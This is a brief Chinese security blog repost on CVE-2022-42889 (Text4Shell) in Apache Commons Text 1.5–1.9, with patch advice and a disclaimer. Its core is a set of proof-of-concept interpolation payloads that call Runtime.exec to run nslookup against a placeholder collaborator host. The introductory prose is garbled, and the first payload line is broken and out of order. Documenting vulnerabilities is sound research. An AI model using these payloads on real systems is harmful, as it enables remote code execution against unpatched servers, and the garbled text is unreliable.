在 Apache Common Text 包 1.5 到 1.9 中发现了一个存在缺陷的代码执行版本。攻击者从 Apache Commons Text 中包含的过程中成功完成,插值可能被动态定义。服务器应用程序会受到影响(RCE) 和不受远程服务器的隐私接触的影响。
1.5<= Apache Commons Text <=1.9
poc
exec('nslookup COLLABORATOR-HERE')} {script:javascript:java.lang.Runtime.getRuntime().
${url:UTF-8:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
${dns:address:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
${script:javascript:195 + 324}
DNSlog
命令执行
目前该漏洞已经修复,受影响用户可以升级到Apache Commons Text 1.10.0。下载链接:https://commons.apache.org/proper/commons-text/download_text.cgi
项目地址:
https://github.com/silentsignal/burp-text4shell
-=[感·谢·阅·读]=-
原文始发于微信公众号(星网实验室):CVE-2022-42889 任意代码执行复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论